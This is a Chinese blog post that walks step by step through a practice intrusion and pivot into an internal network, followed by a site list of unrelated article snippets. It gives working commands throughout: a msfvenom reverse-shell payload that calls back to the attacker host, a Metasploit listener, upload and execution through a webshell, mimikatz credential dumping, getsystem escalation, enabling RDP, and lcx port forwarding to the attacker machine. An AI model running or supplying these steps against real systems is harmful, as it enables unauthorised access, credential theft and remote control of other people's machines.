内网端口转发与代理

news2024/12/23 12:23:35

思路:渗透的前提是双方能够建立通信。目前无法和win7建立通信,但是拿到了windows2003的权限,所以可以在Windows2003主机上面建立节点,作为跳板机去访问到内网。

目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
                  发现内网win7和win10
目的:通过控制的win2003  访问win7(IP:10.1.3.136如果是192.168.1.162也可以),
        win10无法远程连接??

攻击机:本地192.168.1.122
                VM kali:192.168.1.146(10.1.2.152)

MSF代理转发通信(正向连接)
1,利用MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
结果:
    msf6 > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
    [*] exec: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe


2,msf进入监听模式
输入命令设置本地监听,具体命令如下:
启动msf:
        msfconsole
选择工具:
        use exploit/multi/handler
设置攻击语句:
        set payload windows/meterpreter/reverse_tcp
设置监听IP(注意IP地址是本地kali机器的IP地址):
        set lhost 192.168.1.146
设置监听端口:
        set lport 4444
开始监听:
        exploit或者run


3,使用webshell将脚本上传都目标服务器(蚁剑为例)

        2003中,phpstudy的端口为90,

        外网访问 http://192.168.1.200:90/phpinfo.php(相对内网来说)

蚁剑配置IP:192.168.1.200:90/123.php,密码为123
    编码器:选择base64(两个),点击测试,提示测试成功

通过蚁剑上传su.exe,
通过蚁剑的控制台运行su.exe
C:\phpStudy\WWW> su.exe

msf上线
[*] Started reverse TCP handler on 192.168.1.146:4444
[*] Sending stage (175686 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.200:1082) at 2024-04-29 00:57:12 -0400

【win2003中的IIS还有一个内部访问网站,IP为2003的IP(10.1.3.128),端口84,本地可以访问http://10.1.3.128:84

这里有两个网站,IIS的04网站是内网访问,PHPStudy的网站是外网访问,

被一句话木马控制的是php网站,蚁剑上传的木马也是上传到PHP网站内,所以这里跟IIS的网站好像无关。。。】


5,信息收集
调用mimikatz模块:
load mimikatz
收集账号密码:
creds_all
查看当前目标机器IP地址:
ipconfig
需要提升为system权限:
getsystem

查询权限
getuid

6,使用转发工具进行lcx.exe端口转发

        通过蚁剑上传lcx.exe到win2003


7,开启3389远程桌面(其实2003不开启3389,win7开启,也能端口转发,但是怎么开启win7的远程桌面呢?)
run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] The specified meterpreter session script could not be found: getgui

上面运行失败,这时可以运行
run post/windows/manage/enable_rdp
结果:成功
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20240429034339_default_192.168.1.200_host.windows.cle_651229.txt


目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
            发现内网win7和win10
目的,通过控制的win2003访问win7(IP:192.168.1.162),
win10无法远程连接??

攻击机:本地192.168.1.122
        VMkali:192.168.1.146(10.1.2.152)


8,MSF进入shell命令行,执行命令,将目标机器的3389端口转发到攻击机的IP地址和自定义端口上
shell(注意,这里一定要进入shell,否则命令无效)
        lcx.exe -slave 192.168.1.122(攻击机) 53 10.1.3.136(win7,内网其它机器) 3389
        lcx.exe -slave 192.168.1.122 53 10.1.3.136 3389
说明:2003的通过端口转发,把内网另外一台机器的3389端口转发给攻击机53

这样也是可以的,如果不是内网IP的话

9,本地攻击机执行命令实现端口二次转发(lcx工具的规定用法)
打开本机(不是kali,目前是x13)中的
E:\......\工具\工具\lcx
目录下的1.bat,执行以下命令 (这条命令最好比第8条先执行)(其实就是在lcx.exe位置打开cmd.exe)
lcx.exe -listen 53 1234

10,攻击机打开远程桌面连接,直接连接本机的1234端口

目前存在的问题:怎么获取win7的账号密码,怎么开启win7的3389

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1636854.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

工作任务管理平台B端实战项目作品集+WebApp项目源文件 figma格式

首先,作品集是什么?通常应该包含什么内容?为什么大家都在做自己的作品集呢? 作品集是个人或公司展示其过往工作成果的集合,通常包括各种专案、作品或成就的范例,用以展示创建者的技能、经验和专业水平。 …

STM32利用硬件I2C读取MPU6050陀螺仪数据

有了前面的基本配置,这节读取MPU6050的数据还算是简单,主要就是初始化时给MPU6050一些配置,取消睡眠模式,MPU6050开机是默认睡眠模式的,读写无效,所以上来就要先更改配置: MPU6050寄存器初始化…

SSH远程登录实操实验!

ssh远程登录协议:默认端口号22 以下实验7-2是服务端,7-1是客户端 服务器的相关信息: 服务名称:sshd 服务端主程序:/usr/sbin/sshd 服务端配置文件:/etc/ssh/sshd_config 客户端相关信息: …

【学习vue 3.x】(五)VueRouter路由与Vuex状态管理

文章目录 章节介绍本章学习目标 路由的基本搭建与嵌套路由模式vue路由的搭建嵌套路由模式 动态路由模式与编程式路由模式动态路由模式编程式路由 命名路由与命名视图与路由元信息命名路由命名视图路由元信息 路由传递参数的多种方式及应用场景路由传参 详解route对象与router对…

java入门-包装类

包装类 Java语言是一个面向对象的语言,但是Java中的基本数据类型却是不面向对象的。基本类型的数据不具备"对象"的特性(没有属性和方法可以调用),因此,java为每种数据类型分别设计了对应的类,即*…

生成式AI定义全新座舱体验

生成式AI定义全新座舱体验 随着人工智能技术的飞速发展,生成式AI作为其中的佼佼者,正以其独特的魅力重新定义着我们的座舱体验。本文将深入探讨生成式AI的定义、特点及其在座舱体验中的应用,同时分析全新座舱体验的定义、特点,以及…

【LeetCode刷题记录】101. 对称二叉树

101 对称二叉树 给你一个二叉树的根节点 root , 检查它是否轴对称。 示例 1: 输入:root [1,2,2,3,4,4,3] 输出:true 示例 2: 输入:root [1,2,2,null,3,null,3] 输出:false 提示&#xf…

三维SDMTSP:GWO灰狼优化算法求解三维单仓库多旅行商问题,可以更改数据集和起点(MATLAB代码)

一、单仓库多旅行商问题 多旅行商问题(Multiple Traveling Salesman Problem, MTSP)是著名的旅行商问题(Traveling Salesman Problem, TSP)的延伸,多旅行商问题定义为:给定一个𝑛座城市的城市集…

4-b12(汉诺塔),要求给出移动过程中每根柱子上现有的圆盘数量及编号

【要求:】 1、假设圆盘最大数量为10,其余输入格式要求同前 2、要求打印初始状态下,起始圆柱拥有的圆盘数及每个圆盘的编号,在随后的每个移动步骤中,打印移动完成后每个圆柱的现有的圆盘数及编号(效果如下…

基于SSM的志愿者管理系统(含源码+sql+视频导入教程+文档+PPT)

👉文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1 、功能描述 基于SSM的志愿者管理系统3拥有三个角色: 管理员:用户管理、志愿组织管理、注册申请观看、活动管理、报名管理、打卡管理、公告管理等 用户:登录注册、…

C语言----函数

1.函数的概念 函数:founction c语言的程序代码都是函数组成的 c语言中的函数就是一个完成某项特定的任务的一段代码,这段代码有特殊的写法和调用方法 c语言中我们一般见到两种函数: .库函数 .自定义函数 2.库函数 有对应的头文件 #i…

咸鱼之王攻略:2024强阵容搭配

欢迎来到《咸鱼之王》的世界!作为一款集合了策略与角色扮演元素的游戏,本攻略将为您提供一系列关于游戏阵容搭配和咸将选择的建议,帮助您在游戏中更好地获得胜利。 1.了解游戏阵营 《咸鱼之王》分为四个阵营:魏、蜀、吴、群。每个…

什么是 Web3 的生成式 AI?

从 Web 1.0 的静态、单向通信到 Web 2.0 的动态、用户驱动的格局,互联网在二十年的时间里经历了一场显着的转变。现在,当我们站在 Web 3.0 时代的边缘时,我们正在见证更具颠覆性的事物的曙光:生成式人工智能 (AI) 融入我们的数字世…

anything-llm的嵌入式聊天小部件

anything-llm 详情移步到官方: https://github.com/Mintplex-Labs/anything-llm anything-llm可以docker启动和本地启动 例如:docker 启动, 自行去安装docker哈 cd 到docker文件夹下, 窗口运行: docker-compose up -d --build运…

数据库基础--MySQL简介以及基础MySQL操作

数据库概述 数据库(DATABASE,简称DB) 定义:是按照数据结构来组织、存储和管理数据的仓库.保存有组织的数据的容器(通常是一个文件或一组文件) 数据库管理系统(Database Management System,简称DBMS) 专门用于管理数据库的计算机系统软件;…

[1671]jsp教材管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目

一、源码特点 JSP 教材管理系统是一套完善的java web信息管理系统,对理解JSP java编程开发语言有帮助,系统具有完整的源代码和数据库,系统主要采用B/S模式开发。开发环境为TOMCAT7.0,Myeclipse8.5开发,数据库为Mysql5.0&…

IP-guard WebServer 2024年两个漏洞简单分析

前言 这个漏洞看完索然无味,但是手上又刚好有源码,不看他一下又觉得可惜 权限绕过漏洞(QVD-2024-14103)简单分析 网上冲浪的时候,看到个买不起的CSDN专栏 这里基本上定位到是_mApplyList 出了问题,前面两个是ipguard webserve…

Flutter笔记:Widgets Easier组件库(4)使用按钮组

Flutter笔记 Widgets Easier组件库(4):使用按钮组 - 文章信息 - Author: 李俊才 (jcLee95) Visit me at CSDN: https://jclee95.blog.csdn.netMy WebSite:http://thispage.tech/Email: 291148484163.com. Shenzhen ChinaAddress…

2024五一数学建模C题保姆级分析完整思路+代码+数据教学

2024五一数学建模竞赛(五一赛)C题保姆级分析完整思路代码数据教学 煤炭是中国的主要能源和重要的工业原料。然而,随着开采深度的增加,地应力增大,井下煤岩动力灾害风险越来越大,严重影响着煤矿的安全高效开…

机器学习实战 —— 工业蒸汽量预测(二)

目录 文章描述背景描述数据说明数据来源实战内容2.数据特征工程2.1数据预处理和特征处理2.1.1 异常值分析2.1.2 归一化处理2.1.3 特征相关性 2.2 特征降维2.2.1 相关性初筛2.2.2 多重共线性分析2.2.3 PCA处理降维 文章描述 数据分析:查看变量间相关性以及找出关键变…